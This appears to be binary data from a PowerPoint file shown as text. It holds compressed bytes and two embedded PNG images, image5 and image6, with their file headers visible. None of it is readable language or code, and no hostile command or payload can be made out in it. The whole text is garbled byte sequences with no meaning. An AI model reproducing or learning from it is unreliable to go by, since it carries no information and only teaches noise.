.P....<].. ...|m.Mo..._....&....9...mt..Z...K4ww.,....t.CA...G.}..5.ZK..N..?.O....].Z...........&hx.5.?    |X..F....._._.X.o.Wz.7.D.U..[oM....!R.,<.JQ.IF./V.09.aJP..Q...s'..p.
.J.j..U(.r.Fr..T.%Y..'Q.Bt..f[^<.MNTq..]J.:|.[.'N..*rx..5..y..G..].R||....G.5..y..G..].R||....^.?.....`......>..:..<1.3.:....|a.[../..}.wS........4...V...'\}.Z.K:........-O.v...=cQ...t.>.uO..........V....Bu_.x.D._......].......~...I.G.Z...........j..5.........#.{.......R.....u.(.....j.h.s.c
R.*....J.iW..yR...Mb..T*J.*.....7':U.E.E.u9)c(V..f.M..*..!.O.5..y..G..].R||....G.5..y..G..].R||....^..#...'..j...P.g.<...x.<..}{J...........v..:G....x(.M.].z..<u.........9...    $..p.....c...>.x..w..=.xw....[..?.._.m...[H.[_.C..........FO.M.J...iV.......g...yn"..iP.U..!...q...*.J.S..B.h..Z.K...kU....U.(...'.j...~.I:.g(......Jq.9kok.RM........k..<...........<:?..k..<...........<:....    ...K.V.....~...6..Y.x7.^<........3......|+.>.Z.s..........V0.z...5/......{.[}>....n?g......k.CH....5.....Z.....H..6?.4}....~...s.W...|.5........]h..5$...-m4..[.,.[(....p.)b.b.R.K.
.t.u0T.4.T\......d.R.+&...I......U...X....W    K..T...P..Pn...
......S..:U.O.?..k..<...........<:?..k..<...........<:........o...W....+.8xW\...u;..hZw......'..e.._....h>.......~..B.t-:...M.n....i> ]........:.6K......se.O..x.......F.....?.<q..z.~.....=.....V.Y.....<..x..O.]4.W.>.x[......:.....G...e[-.R.*.0.e..a1....>.....}s.).%N.J.(VQr.=....':......
.z.j..^...R.kb.G.<4...g7%5JN:..E+^J.....5..y..G..].R||....G.5..y..G..].R||....^..{.[.w.?...>2x....kD.?.....6..................G..........
.t...h.o..$j..D._.n.,.. ...........\.?.|s...x.>.......O..5.<+..'..|..4-../.|S.C.V:u...."...../..K......6.ZU.[F.Z3.J5..$.Rx[J....;~jj+..(T....q.[..j..<D......*..S..Y4......-'~JX....nI.*....7...5..y..G..].R||....G.5..y..G..].R||...._K.?.M/.....k......u|.Bk.n....|G.x6...    $...m;S...>...!.~....C-.....G.....A=..i..&.<....s.[....N....X[......l...x.1j^....E...j.^x.........k}..}7J.N..x......O...3...r.#Z8yC....*.......\-.SO...*b...O...
.........).tS.....$.........ia+.Ev..\.).>.Z....x....%'...xt.Z....x....%'...xu.i.......R...5........|!.;O.>.w.;..:6...O.|?.x......7g.+.Bq>..S....5{.#U.....K.......Y......'.<[....vZ..."x!..._x...H....f.B....!....>.k...S..j.-....N...I.o.......K...766..ac.".z
..azk.p......._V..u...+...G.j..{To..\..?{Z...V.cw:....t#*..j(....(...(...(...(...(...(....a}u._YjV2...}.....#......-...I"...4}....6.2.........O..?.k>6......>....~.|.....[...Z|ZW.MK......^......O.....O..o.z......>m....e..).....TT.x.U"...T!K..s'..4...]F..!.T..b..pspn....q|.~....v...eV..^.....g9_.3.R.mKk........y..P..D...o.........A..3.*.K....|....5..4_h..="..i..I}...e....W6...k/.v...~..........x#...t..>.|".......[.........q.I~"..`j..O...t.)x-.uG.,.........*...*~.T(....J...MR.qp.>G._g.c...-...qqI,Ee:.J...
..H..eR3.f.U...R..jJ.J.,.Y.O.up.j.nt)8}Q}.j.....g...x.A..!..-+..^/.>.|#.....E..-...]...K.....j....(.h..Qyy>..\...k6........E.......]...k.G._.$..ZG.....lIr...V/k.....+q..kr.(.%..G.Z.|.E.W..U*.m^......BU...j.[T..3.!.wN..Y.i'&...FJRR...^JMJ.%*T!.Zw..B..1.q..F.5hS.W....c..]....k..]g.........w..../.<Ae..C...'..o...*.......kxX...m.....W.uOQ..../...w...O...^(..<.4...Ay......;;_.4_...>...s.....-.V.|=.k....x..F..l..k..[....)..._..(..:/..#z4...'d.J......0..*\....(.2..cRUc.6....!:.OERQ.N2.\..8E.......nO..K}T..H...[..m..R.V.y..].n.K........|@.6...CJ.Z.....~....u8l...V..,.......n<.B.../x{....(Yx.J..g.F..|G.#.?.|_._./...|K.......<1.|?........icq.....;;+.&...../....l58.4..)..
.Zq.*q.0..c[......T ...T.(EJ-EZ.V....T.......97<])..,T.o..N..R.gz...8.JM.......h.._..c.]....}V.Y.}.....v.....|W............,~.x..~..t.....Z..ug...i.h...u.{....<I......4ce...}
.];.....U...g....&..F..x.O.<].........'.F..x..k[{.]ZB.....)K    ........Z.p.T.......t..z.....I.tiJ..Sn..b...V..(T..P.R..Fr....S.V.I..:.j...H59.....=.................u...m.iz...;._.
.&X\k......>........].Y.t...V.Z......MFv..HQ.....c.@xK.Z....x..?...................|(..R.........!......o.Ae......j}Eo..w.......J.gJ....8U.*q.J..N4....r.iR.)S..P...)F)(M....T..8SM.A...5\b.......Q...%VW......~.......~(....G..+J..#........_........W....
...<.`...#.1.{...j.Q...L.1..<M.q~,...gs.x.~.x.......3....>.......}:;[}M.]..~&.u......../.j.....S.vz.P..{.~....../.Z+9a0..C.*0......iY:4*.......Rxz..<=Y.U.F.*t.
t...j.....7.g^."P~.Uj.xz..W.!V......J..Vs..U.)}].o~.z...a}..N.<A.k......~....c.:G..?.'...>
.\.q.mw@....k>....g.z..d.U..=......|H...O....../..Ake./.?.-.......x.......<...zF.#..n.:]...$w.4.#.....%.)<......T...T.S.Td.AJ.+S^...oN..R\.j6.M[....Q).RiU..TJRJ.i*..Y..ue....+...Sv.>b.(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..=..h.|.....w.~#......<.....w...d:M....V.C.....6....Yk..C.i..i....,....t....}.s....@........[.._..f..9Km...[.T...m..<,.9.u..-.....>%i1...v.Zx.....|}.b.....x......^P..
K.<=ZT...Qbc..b.&..[V.PQ.*..aZ..<f.JT...^....'8.J.%.....A._.S...*.....B.\.J.?.#.w..k..Q..5...vz..<;............9l-.}.~#....k.O..x.N.|W.x#.~...u..E...5.~.._.u.jZM..E.;..v.7..V..$z..5.....................{.q..7...~>..&O..7....|.....iZ..A....>....w.....j......ia.KsSS....zqQ..,o..U.8.R.|D.
x\-.a+.:.nN.8..*F)..aRU'R.O.FR....hB....zx..x.V-....I...X.'.....6..|D}....-..../...o.</.........S....o.|...X.oo.....),|[.x....#.........>.]~.....j.....z..'..4?.?..|C......mm./.|E...w.GM.'......W.|9..CL.6....w....k.H...v.._...o.S..F...#.......%#.?....#...O..>"...?...N.......hg...........xJ......(R...UNP.'..:..Xs:4...\...B...1J>....I..    *...RS...........B    .U/R.:....8T.nT....?Y.Z....?.s.>..<A.H~2|=.6.u...?..t..........v~9.l...h....)...R.........    h..<!......m......
,5.J.M,..c...O?c..h.
..][.~........w./.Y...'..:......sO.mW..K.o.O..Y.V....8<)..j......f..    ELpU..
x.....p.N1.X.Ri....t..e    ....)..Ha.a.u.Q.T.........,.u..9.X<5y.r.(*...S.Mb)b..Am~    ~.....|I.k....z....X....j.......E..u.....q...x.x...~..o|1o../.^"......U..%.ye..C?............Xu-?..$....{...".....y..E........%...._N.<+..............Y.V.W~+..Z...?..V.V..U.z.....
.rqT......m.........4.'Z..*.T'E*...:T.IF..X.G.Uj..R0...^zT...F....F....#...................................................................................................................................PK..
.......!.................ppt/media/image6.png.PNG
.
...IHDR..............B.<....sRGB.........PLTE...4..d.....$B....V..`H$.F.t.............D.......Bt...4Z.......JL....nts.......D..L.n........s.......t.......D............^h...d......tcEMJK|~.dfd.*.Z....D..t........$.j...d...LJl...Lv..............rR..........B4..d....f.............L...g1..$Lvt..............d.fd.....dLZ|.....D............%*$...JTd.....$...c..k..tv.......L.R...bf.Ln\..f.....$Ht.............mV4.B..j....L..kZDkz......d...."..bd.....4..K....v.L.4....u$.b4D5$.2....PJ.m.t.......J....m...W$5Ke.Jt..t.Z..n4..d.vdLn....D*......d..D:j..r4.R..r$.vL8j......TtBt....:............X..T...twqtsQe..l..tv.........d.......f...s_et..4DXtt.U..4D:4.R4......y........XF4..T..t...kn............t........T.....4.b$..t...$*4..4.........Dw.t...r4.:.$P.t...zt.........dr.\VT.....t.....tTNTLCt.........$G..............t.tiT~)v....|IDATx^.]t..u..-....(.d#.P.!$,5..V.BB.    ..^    i[.5(XP0
.I&.cQ..Z.%NbL..U.>9!..B..*. ,..X....u..8...j!.k.....y..}.v.?...`...o.{.....IPn.-.....`.OrGx..x.x<.    I.u@...9.<...] l..-...\......).............lq....N..>y......(.A.K....B......../.U.......1...L..Lx[}f.cn...`.5Q{.O(....{..ym...Vxz.o....mvTeKa.[.PQ:..qj....6..2...x2.fd......Z..6.WZss.+.)%mwW.f..6.~..x....-...m.-j.zfn...|.%....?h.-j..v...........c0...t8......%...|..-.NGUz=.]'....e.;G.X!|A..-.....    |M?.P..v.....U...`.....it:kl=y{&..........&rs....W..)...../......|]....."(J.{..ml.l..............._.......q.......!...u?0.b...^..q.a........a.....i.RRV...<.........&..........o..+....m.T.K?...)..Z...F|.........eI.....x%"t.........V%g_8....:r.w.c._...../'%U..\.V..:D...xK..<...y...mq.....n.Y...H.p..}.......fH...uK.,M]z...../.....-....m....r.o...|..SqI.>.`..q[.n.zb...;........$y. ..v../Y.r.8..7l~P...o........|+R.:.....[Q`.~...Vdg........!...;..BX.,.3IkP.v..now.`.:`F..F.eil......r.=.......o.[....I...s2........
g..... x.>..lmh..........1H.v..N~...........9..wq.
....UE........p...7.F...{v...g.x..4....at..B..!....+.$....]..<...}......v..:......3..E...F.r.'..$y. 6..n..n........Quxn
b.....0V....8o....,...5.....> .l..S.....)....e..$...?LLJJ.[.6.....zPI.B..%.K.f...Z...B=c.(?..5x...#.)....g7<syfEERy....H .[...2C5...........{/.<....]&.I...*.[............]b.R.x..!.VR.7..>Pw)........W..|....fk|.}.F.=.$o.(...7rn...p.8.8.VZ.ka...e.    ...o;p..eT....'.xI..Ew.?`_.t..B.!^R..@0.....7x".p|.s..m..U.....>..W!.._V.m..`D.3.M.....8....d.?.O..*......yhL..]....7.K..!..a....    ..._.xXt    ..m.....l....ZY.g\\.f.@X..I.58..O...[...]P.h..U..5%'7.O......j.1...A%y.u..!. .....-.54hI... ....-.'....m.'/.?..M.l.X.gq.I0qhI.`u..i.\2q...D.#..<'`..nq..$o.^.d.Uc+..[...:.`S...^..YZc..TNz|.MV3-."VWF.gH.7..<n---..eee..r.b3...&,..u.O........{..*..8..$..*H.'.9...M.....=.d~I..y.......O......%b#a..^.O..m'..VX.c.M...8..7..........g.f...9.9........9.B.....jZ:\y...l.L.....a[.v..VWW.M.3..A...S...dG...$.o.k....k...[.m.7.4.!l..........p..-.M.....Y.."..k.K.......Ph...
.(q...`..>..VSS..f4.I.....N.....o...._.....W.f./6`m1.........#......S>...(..1..+..5..!oQ.7..0.N
.<...mI.x.......do0.%.......c}..N6....].....W7.[.y.....]....}..l........%./.......J....~T..HH.<..^...xs.....6ih&.q    ..z...+.]@............@..*3.&._B....(...z..{.q..M....ol..4.5mY../.x..N.Mj..7...7.....c..~    ....LEl..%:6.7........0....d..g.%x..N:..{.....V.O..........N.,:.....~I'..."%..7J.....$...[e...%A.Kp..&HB.!P.$..m.U..F....@F....    .1!.@.x.y.S........~    .C..
...?.m.&.;.6..@...(..$t.I!Q...m..K....~    ...aIj...Z,...X... o.....:2..X.O.t.._...9..8..+g....a...HC./.......B1....N"^..n6...W0t...Qc.....Ze.v.0..T..o...L_....fZ.&%`.-B.A.A..u.OK...]13.x.._.......i.Ww.rS......z.@......gl....*.6.x...Pl W.,M...`.......< ..    .K(..R..H....3g|....        .....R|Ro:..%.....R.6.l%..o.G{.....d.&./.....4...,O.h...Xp..7.lA......... ..b....M._.l..5.c.'Sz~}.&.j.1 ..ZH#.].+..|.."...&<.@.$.M.~.f.j.y{........S..>..b..H..... .....a...'.~    .O.(..*.TV..4..Gf..D.HR..%Qe.yU.hc..E.~    ....Y-S*.>=.....|t9N..."W'.l-i..^.3.......Plgfx.+'.._>.....xrH.+.W..|.l'..%.[...?_....n....E0..2..%6.<@._B.......~|.WK....+@...\B.............=..?...@.D.f..Z&.<.3.a....x.D*...s.......K.f. .o~....`.../Q..`n..(-.S0.s<o.MZ
.i.......8....7......-..*.M._....4o...G...~... c.\........dC2.`w...j......P...#/.(..o..u.k......X..b#7.Hj:..........D._B.%...,=.<yU...........'......0M.B..H...x    .....U.....pa.6...$...l.N.5;..._.{$......l.O.k.?7.....F..?*..<.....I..fi:.-D..s-./..%!m...%K...u.G<o$>...P.........H..O.M3.4j.7.~. .OV....k..@.-^U....Q.hJ(R6..g.`...3i.$o....[.....q
h.'&v.xC...4%..).M{./.[X.FM.&./..VM.M.A.M....O.7}.......h.....&)o.I.5..h.Lx..\....u.......Xk..F..V&y......I...+.g^.OB.....(...{..o.]....M.G.~z.m|;.n......4.d.I....xRl.......r.{&..,.S0k:.8.......S.~.....Z..J.W!o........N.R6).M._b.+k.....    .K...;o./)..9I|5...g........y;bnRy.~N.@.$G.....>8...^....KR.........g}W...!<.W............X..`sp....{EJj...CB>...!.X?...p6...s.6....K.&....]....s.s.r0.;n....F.7.goB.M....Kt..g..@...QJ.....U..,..@...Y..e.OL.&./A.d.}.!..F..........#Rw?.>T....l...f*./!6.{.n>.......M    k~..X..."9.....i...%.-a....)..Y>..<...<o.x..;.o{>.['UeCw,u......P....1.5y.@.............=......"6J.../u.....&..y...._..o\.Nj....O.M....9......}m..'.{._z..[.7...._-O....,..3..d4r...D.9.l...[@...-......x..._....+?q.x...=.;...`.........H..O.:.k\T..<.    0.o.-.~...i..F...O\s....s&.{......t..=.F9......d|<..-.x.)..0.5.N
..j;.......T.X.s.......q..s^|..o...`#.b.=........=....-.<6.b.H..5&...j...6.M^..h1.%6.:o.o.....3.o.........$..w.Z+7............q..m....I.Mj.....%F.7GH.&._Bm...-....Su*......!...c...h.....P.K.qI...9T l../.6...K..
.o....KB./............OZ.d...._q.......AS..u.j|2J+..\    ...~    .-..M......4..Y
........K.6`o`C6}l......e...d.u...%...@./oT..)t1%..\.../....g..3K@N.>...>0. ..g.....K.........ij.....<<+]..[...%C../.....*.zf.....n..f..B./!y.Y.g....3...{r=...&of.K<Ng.....Y....C*.U..vq...w....5..../~>.v...M...6.4x......<(?[...../.p.l}.&L.../.eS>.d..C4.!7R}.....{]$....v.C.&..
.-#-..P.......1....}h!I.K....X.GL\.    J.W#b.+ma}-$..Y..vH
....$.M...-.."..qI..Uh..|a...f,h....-.y/.}.....#P...lQH......ZH....KH...t.;Y&.>l.o.........m|.....}..b...N8....4.I..N.Uf....z...H.&I...4`..,. ].....)0.[P...} 5.W......}...6.z
P...}x..4[..$..0n.].>..=.I<.,....
....t0....u........n'w..N.oJ_.../l......E.6\..x...$.d_/...........7M......Qlj.{{...f..U        .....%;.|....>.e...=..H}...D.$._B5u.{.K/....X..1.....
.3V...)"...g..l...............%Lc..z.j..Q...h.%./...R........jvI...m..?.v..N~..w+....~.T.....9...}A.KX....
,..:6...._....kE.oA.K.n.A^.:q..}...X......>+...*._.....1.?..`.%.{3..'n.M4.....[R.<..    g.4....w..[.7u\.K..u.q.o.lrh.f..;..@.....x9..YP*.....\.}..]7.x    P..B.D....yw0.4......M~D7U    %...xI0...~.L.._.O.'.[..:}..&...C...d.20<..I....(.v.:    ...t~.:...O.7\...\.2L.t....e..Fb...t=.r.1.j...&.. .)....6}7..K.k.\[..o..@l..u]d.C.PF6
.&l.oA.KD.......k".....H....B.    ....~    .$.O.D.[d..ct.......%u...y..}U......x    .o..F.y@.......P!./.y...[0...9.R0`}...\:o....}.h;i...~....E.%l<.....q..PHm.~@.~......niay.45.8...m........~[".[.....H...R.Y.P.q.u+.Q3)...........K.....$o...8..W[._...tR..%q.M..@...9v[....    .K(...-~.gK..._R].7......x....w6w...R.x.@....8..........c...[a.|..M._.(.mF...T....wP..&.-......8d..3..7.V...=.!c..
.[..7.~    .........7....%V.>.u..I.q ..[.[...[.[...[..u1......`......Jl..e.7.se..#.Y.....&..Tr.7+.!_.......J..f%6..2.....R....|.{.......IEND.B`.PK..
.......!..s..............ppt/media/image5.png.PNG
.
...IHDR................)....sRGB........SIDATx^..    |....l.O5...a'.4...`..;.bM.(Z...>..R.+j5,...Z}..._kEc...m...%(.....1    K.$,..h[....Yf93sf.7.&....W.;.=..}..=.......Fp...................qr...A..@..@..@..@....$.h. .. .. .. .. ..H...@..@..@..@..@...9%....w.yw..C..M.}..o.h<
t .. .. .. .. ...N.....!.$.........\.y....A..@..@..@..@..l..._.(18...~...._}. .. .. .. .. ..]....F.J...u....]/~D.. .. .. .. .. @    .x........O....@..@..@..@..@...*...............*.... .. .. .. .. .....'..z.r...... .. .. .. .. .U    ..;.?1.......WWE..@..@..@..@..@..^.=.?1...5.....,................J`....'.S[.U.G\ .. .. .. .. ............Y.>.a..~e...+.m...)U..    ...w....1!..C..q...%..d.}.Hx..u..B,...@..@..@..@ ..^p.......S./...l....&......:.......S.7.....>..6...G..v.qS/}..!?.;d.7.....?.6|D.......#.T~.......&....$j..~s..)..DE.&A............x!0ml...)mmmJ..x.......o\u.k.+^..{.........f.!....;...E..kG.W7..|.}~u{...D.M...`G..k...D.. ...E8..x...xu8eQ..@..@..@..@.K.xc.e...O....B...e......z......9nj.va............6.d......AE...........O2...n.".'._06....4...eO.[.tF..M.+......g..V....Z.
..f.,......s..+.........s.h..r*s/...*.L!yU..j......2i.....H.*b..+.N..O.=...b.....-......K.k... .. .. .. .".....Q.u)._.....E...I....~~.....~.f....>...s..f]M..|......}.5.....[{d.....7.?.....s..g}k..... ....P5....9V....v'O8w.i_o.P*.. q..o..l..% ..7%_..5ic..T....\...../Zy..k..n7s...?.r.Jq....o9.,...0*-..m.O}T...T...Z.z.=..i...Sj......................qi..g.R.S......Ob....    .....}......S..E...l:|.P.}..>a.|......[
.A..@..@..@...4..'...}.-...G...........m'N.5..2....C.D1.<.^?..<.W.5no..J%..)Yr............'N|..5laL.3.....W....?.X....e.'.D...=........    ..?....\]R.x....U..W...r....[.9..N..d..c...........L.S...O..I~..md../s..7~..(...=z.....}a..Q.I.@...R .. .. .. ..].....&.t...1.......?Tz..r....M.>.......^...D}.B.BR...uk..v....8...........zQ....,(.}u.E.
o.ZlWh&s..f...2..^J!....    .G..IO.....F....e.F...6........C....2t}... . .. .. .. .. pr....x.GZO....^l.;..O...[z}..'7.OH?:v.....S......~].................    .L.....s(q@/f'y..9.
.    .z..._.h>..g....v.+..."...:-.v..p.9._.q.....\0M.>..g....N'F.IZ.=..}Fs..'.s.f.^4..s.................?Q.-..Y/..............N.....U.{I......t....kW4...z.oF]H..}..H..........r.g..-.._E.?.......6..X...h.....w.kWT....J.].....l9qb..G...2....[.fWn-9.].?go..?..y...t......Y.D....z..O.8....    I..o1,.Y..[..w....]o.S.x!w.....5L..............^..w-s.....oo\....@..@..@..@..N&.rb..s...{.Km.8....o..BC..5..G.U..qu.=.|..c?yu.V...c..C=...........@<.X.........{K.)&_............D....r...-QQn*.}....(6......-..................O.O.&..r...0..............@l.X..u........Q.;...............v.X.......w....
................6..'s...1w...Q.;...............v....7.'..g...#(.. .. .. .. .. ....]p.bp...c;
x.. .. .. .. .. .........\......
................6.....bp...b;
x.. .. .. .. .. ..............2.. .. .. .. .. ...M`..?.O...{6...w .. .. .. .. ..."......A.,.0..............@\.8...M.pSSS\..gA..@..@..@..@..B#..wo..7B+
i................H..AW.U... .. .. .. ..!.@b."0..............@W$...+.*b...............     1....A..@..@..@..@.+.@b..k.1.............@..\.t...!..8..............@<......n.3.....*........Ma...Zlr..Vv.|......U.].....4i.....[....C..T.0.+.T.....'M.aFm... .i..i.....j.bx..../.....3....~.LI.    ...b*.*qvM.....@.b.V].... ....x(.y..h..mS\Ad.........eW...P..@..@..@ N    ...tv..V..P.3s...;r...Z..lq%.._..e....f.S~e...{X|..c...B.....k....3.y..`.........'a=R.....[.......k...6v.^....Z......NV.5R.=kW.z%.c...Rx...<.....}..>..=.S..G.C{.........SV\...N%NC..
..w|;.Nl.Vr.@M.bUiNN.pS?.q.xRo7.....    9.p@.....d|.`C..m..q...........4..3..+..C..[nO.j6.*E    ..........&.fb.S.......s.QGs...R......z..Z....C......../.~.A..>....];TY5..l'....).U.J%..*K.N....=M.}{.;...tHC..(yE.......<......e.....E.1.^.Jw..d..{Vh..)ff.;...j.BQ5..B.a.88....CX.q......=r.a%FS#.s/$........Jh*..'.N%.!z{x
7...`...%.*...).D.....`.e...}.._....k.]>.Z...l......U....8._..;.$hN.....f<...5..Hq..|.p..@..@..@...pM....BJW.....E.......1.i.i=+..v....`...dE....MF.1.2.oD&.iz...u..q..o^v.^$d..../{#oH.I.....O.#x...r..6mq..u..N.
..m..B.k...%..(x..{.....5..{.+..T..e....*.Kk....C.75Z.Y_p..)e..?....(LVd..+R...{j....c....el..yY.l....g.BqJm......}vu.
V...J.!..Yf....N.<.]....J.i........J.S>..k[......1"......m.R...*%.E.qY.m/...&...1*.....1.b=.o.m.di...l...;..c...zG.>..>8<.../{.....GJMZ...G...<eT.}.XnG.)..(..Cs[...f...    .@..@..@.......f.rn.Y...;9g[=.3..-]M.l..cy....=...g...W<\a..?...4=....`...p..^1.pv.....}Gg.t..e..l#.{....;.......t...................P...w.8.>...d..:......w.......f...K..LVJ.:09......#[}...^..k..C.dn.....J+..+........J..>.gZ..~<u2....PU.=K._1.wZ{..FM..MM..gW........<W...h2...1^8.HK.rJ..|.6..NE...A.P7.9
....v...j.vQ......*.u.~...S.h..`C..@..@..@.d".^b.$$.L...U..[
..u.y......g.=...Y....B .%..<1.@;...-iC.E...B7.....=\..{...^...*.......q9. n..j..;..g...M...f_.B....2..f]{.......f../\v..[..BY!q..1k....bNvHi.3...z..g.3,O0..^.Y2.H.........Q...<q.A.X.l.j.
...-.y....fM.l.|..!..<.v .{k.1.:.Dx6.P...A..@..@...&....m$..)...RyO.........B..-...gk.....Y7...o.;z{$.<....O..9d.O8\..6.*.8c......X...*..3tL.."..g....    .6.*........k{....
u....Q    .G[.}.9z....Y.....^..'.L.Ga*..k-...6M..qw.
....3f..o..A...gR.^.g...u,|...D..<.e.t
...=....~BS.....BI......[....&".C.9...-.2....8.....m.#'............R.tV..m{.8[..U.+v......`..\..G..-..............1hllt.P1..]....?..h.S.....T.../?.....X....l...gX..^..!t....6.X.w..g,.....uw=.......
F..^y......).e..&\..Y|..4a..TP....\....{A..Dr....[..<...Y/....2B....&:..tx..;.4...(d.0...r....../.:Q+iXr]...scOMY...$.E.......kU..PS-={f..n.b...8...k:........2...@.R.!..+.!..:.e.L.V.....>.O.:Rr....<.}.......?G.....UkuQ..z.......8[..Yo....a}(.]w.............@.%.._?#.0..7*.>\l.Tw...........$N..Vh..\:.f..QJ.i.....6K...0.P.!.........(..........x......D........lo..&j.^o..J....7Y....\......+.<.hS.n~.......]....0...SC8E;.L..g>.2!....G.. .. .. pR.........o...C.ry..C,...'.....e.72... .. ......R...A    ................#.(1..wo.y.. .. .. .. .. ..Q'...F...D.m...................$..".. .. .. .. .. .G....Qe.U................._%jh...X...................N`.....1c..k...............@..1.......k5<.}...D.................J ..`..7....f.y.#[?....|..j2zh..b..IK..E..W.y4-.ahVSgy.. .. .. .. ..qC ..`....y7t.......b.<.....K.F..K.>.P.!....[M....#....T..m.My.+..................x....y..._|..K.=o.~M.....w...M....7..|...u..RF....?.....?.....r.............o..z&....IY.....~..&V.Y......C.f.-.+.X..p.....m...-.PC.~:....pn....s..u..W64....w....    ...{..p1..1...4....>......................    ....Y..7.wK...~.`W8.WZ...`.....G..... .. .. .. ..6.g.y.q%.......$.......^...^.....~?9....}c....~...).y.3y...!....X.u9[l.......    ....#J;]w...94i.......I2i...<.@.~x.    ..D.9.].!$.[j.....pq.h..w....w...0.].X....... ..*-...I.."..e.....c....O.+..v=<.....e.r..... .. .. .. .O ..`...a...5"I?..w..:}...}>.ua.t.....V..i....zGY..v....*y...1    .`...=O.CE..%[....Y..-........r....v.!Sy>..gB..!.....Sy.......7.R......W..kc... .. .. .. .. ...@..A....qz......1q@..}..o.yvf...O.+?m.7T...wK7C.    .F.q..!......U...F6.h...............\..6.c..!.w...22..tn^lk..4..^+.?\......'.`?@t..N./.>..y...|.z$.u?}.....2..w.0MH..>...O......v.=:YQ_z.2...n.a.U)?......[P....{/..D...+..6h....k...............II@.s..1.8xX.n.?.|...!...O}..!.9..4..{S[>....W./.9.....>.+...gYGd.HH..$r.u@..l...z6..S.z....|.....v..5..s...K.-.?.0N.).}....X8.........*.......z.)~...<.vX......t.6..4./'Y.......)...............)45RF.{.n7
/.. y...C.p.......;..7n|..E3....}.....4z.8.m.....^Q.s..A..@..@..@..b...A..w..1 ..o.x........H.@.
...Y>...3.......3'4:.........|AG..............s.....!.E/q.~Wv..Y]9<... .. .. .. .n....kb.k...;.m.
@..@..@..@..@..b.@r.....,%..8................@.. 1..H...............x&.. .k...............@....1..sg.L@..............@,..<x...f.b.................t0.$.....@..@..@..@..@ .     1..Z.O .. .. .. .. ...\..t..0.. .. .. .. .. ...0c...a..@..@..@..@..b....X.    ... .. .. .. ...H..A'..i................H.b.&...............t".$.....A..@..@..@..@ V. 1..... .. .. .. .. .....t"|...............X!.. Vj.~.............@'.@b...a..@..@..@..@..b....X.    ... .. .. .. ...H..A'..i................H.b.&...............t"..&....'....%T....&Y_49H.....&...{~.E;....v.U.u/.....J)...*...*......b&.e...NR.N...".ec.....D.+%.QH................*.crQym5IOM    ._....)......K\...7..D.3.....*H.....E.q%.i.....{.............F...$.6.....D.U9M..I.~..P}.._|..v6..R
...X;.35...E...T...0.......m....1...........>.......i...$.d.V.3..$5U......{H.3e..).....*q...|.T:.S./+..b@..fC..uc...,8...2j.W.eQ...J....*Eb..&.....o...O.oo..*.`!xH.7:Su;.....k.A^
..f...x..0+.C..... .. ...C ..@.J...9S..f..,....8.9.`_...6g.....8+7...O..tQ.K...~R.i...:..)..N..dr~.9'..K)fxf..O.qL..|.B.]./.+~...$....jY....y.U..*+
./.t.uO.,M.Xj..fi.I.[Q.....i!iM.=5.L....'....../.H...4....6i..X%g...."5..9..X.m....hi...y.h....v......f......
...q.#..Y..jc.6..jl>[?.o..f..r...%(.(...b.H........O_.hTrK...|.....R.BO......v[._..-......@..@ .    .....m.J.8..M|.{j.v..Mz..KXd-..;...0/a..<t.6D.;*d.
.\B..b.E....Y.{SLvJb..K...>..!#..b...ZS.].YUv......Da.r..T...OY.R...E..K..=.HrUW%{bV.......Z.[....j..H.g@o.*....lBN..c..PS
..'...?.."......U...X....|...(..dy../
......km*.S).R.+...hT..i.%m....E...p@.J.V.o-.    ...%....m.. .. ..1A..3.l..X......,.......
..
2.h.4b...Vza.$%-.. ......w.../Y...j...W..
.~E))\,..S...R...we...U5).....}
tBD..T.P.t._.o.9@...jE...~W..@[.#;.9(*H..."_..PA    .Y\^a..k.....&..P..=V.|..#..C..=w..aB...Da..2.@..."..:@
g.6M.W,LQ..E...Aj...-..B...........P..M...p............imX...}b...(...{......r:fkTY.{.|....t.\......9...6*..?...;R.r3..R...d{.....@..@ ....../ .........&6.#.;..a....M-|m...Lm...NI...&m.......p..4u.|S..c4]v...3...n`..ct.Y...#Ls..N.o.p.H[.y?........m.........LT.Pk.C.....4.....L.6....../(..5....z....#.W..b..VL.en.f.-.......P..G..3y.H.m...%.U...C.G..'...PrwC...j........s.~@...L].M.&OcdB    ..>..`T....j*@..Ui1.t..j.U_.3.G..*-.L...A.....K.........(..+..*.-._../...... .. ...@;..y.....&.....0..l...f..#a...r.6...O"mo4............T}y~f...P..JL
......&.x~>[5.2c1.#...6....~_H:...(B..w..R.....E.b.Q...'*.`?.CX.[]\F..6tM\.c.USe|.`....sV9....QS.F....y....1.=[..."1.%@..U....50#.`-...V......sm.%..k.:c'D...5.|6....$..HoL...;......~..|6>.m2..r....c...1K.2......>.\.q..x.. .>...).....1..Me..+B.B,.'>.......<.p.4Ikg-...k...qc...6Y.....%...WfK....NaM.......X.....|s).....S3......._.{IL^.- <en,0t....2LD.. .H.7a...b..un..(27=XjW...39B......Z6Q..5....(.....H..u...m....Yw.q.hi..>.......o.O+......p.8.lib.........P0.P...i[N...}E.W..9..[e.iz.{BA...\./..hJ6..!.#.....L'-nH;6l...|....+.7...9].4K.....l.
+r..o-.s
.......#.o.........,..P.1........ .XZe(. ..t.:.iY.m...)....s.s.`...t..ae...Vyd....w.... .. p...)..F.....q.X...../.G.g...`....K'W.V42..e..FV...<......'....."8.. .. .. .. ...'....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y.H.b... .............D.....3................y..O......G1.h....V...H,x.=...9.:;..E..7..ED..crQ}...........8        .....M......LM....^.h......yabQM....j7..p...j..f[.JCf.a.Ul..i<..hM$T....__T.V........$............D.@......,......r.].(..;.).i.D.5.&.}\3kaK.......t ..B..B..q/..V...]..2'.2c.......K.k1i..m..@..@............sKVk....yaInU.
